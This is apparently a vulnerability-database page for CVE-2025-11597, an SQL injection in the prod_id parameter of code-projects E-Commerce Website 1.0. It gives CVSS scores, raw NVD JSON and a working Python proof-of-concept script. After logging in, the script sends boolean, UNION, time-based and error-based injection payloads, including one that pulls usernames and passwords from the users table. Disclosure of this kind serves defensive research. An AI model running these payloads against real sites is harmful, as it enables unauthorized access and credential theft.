Security Vulnerability Report
中文
CVE-2025-11597 CVSS 6.3 MEDIUM

CVE-2025-11597

Published: 2025-10-11 11:15:33
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was identified in code-projects E-Commerce Website 1.0. The impacted element is an unknown function of the file /pages/product_add_qty.php. The manipulation of the argument prod_id leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:e-commerce_website:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects E-Commerce Website 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11597 SQL Injection PoC # Target: code-projects E-Commerce Website 1.0 # Vulnerable file: /pages/product_add_qty.php # Vulnerable parameter: prod_id import requests TARGET_URL = "http://target-site.com" VULNERABLE_ENDPOINT = "/pages/product_add_qty.php" # Authentication credentials (low privilege required) USERNAME = "test_user" PASSWORD = "test_password" def exploit_sql_injection(target_url, endpoint, prod_id_payload): """ Exploit SQL injection in prod_id parameter of product_add_qty.php """ session = requests.Session() # Step 1: Login to obtain session cookie (low privilege) login_url = f"{target_url}/pages/login.php" login_data = { "username": USERNAME, "password": PASSWORD } session.post(login_url, data=login_data) # Step 2: Send malicious request with SQL injection payload inject_url = f"{target_url}{endpoint}" params = { "prod_id": prod_id_payload } response = session.get(inject_url, params=params) return response.text # Example payloads if __name__ == "__main__": # Payload 1: Boolean-based blind SQL injection payload1 = "1' AND 1=1-- -" print("[+] Testing boolean-based blind SQLi...") result1 = exploit_sql_injection(TARGET_URL, VULNERABLE_ENDPOINT, payload1) # Payload 2: UNION-based SQL injection to extract data payload2 = "1' UNION SELECT 1,username,password,4 FROM users-- -" print("[+] Testing UNION-based SQLi...") result2 = exploit_sql_injection(TARGET_URL, VULNERABLE_ENDPOINT, payload2) # Payload 3: Time-based blind SQL injection payload3 = "1' AND SLEEP(5)-- -" print("[+] Testing time-based blind SQLi...") result3 = exploit_sql_injection(TARGET_URL, VULNERABLE_ENDPOINT, payload3) # Payload 4: Error-based SQL injection payload4 = "1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))-- -" print("[+] Testing error-based SQLi...") result4 = exploit_sql_injection(TARGET_URL, VULNERABLE_ENDPOINT, payload4) print("[+] Exploitation complete. Review server responses for extracted data.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11597", "sourceIdentifier": "[email protected]", "published": "2025-10-11T11:15:32.697", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in code-projects E-Commerce Website 1.0. The impacted element is an unknown function of the file /pages/product_add_qty.php. The manipulation of the argument prod_id leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:e-commerce_website:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8DF9909B-C71B-41A0-B872-842A77B5B3EC"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Blowingwinds/cve-report/blob/main/cve6/report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327918", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327918", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671765", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/Blowingwinds/cve-report/blob/main/cve6/report.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.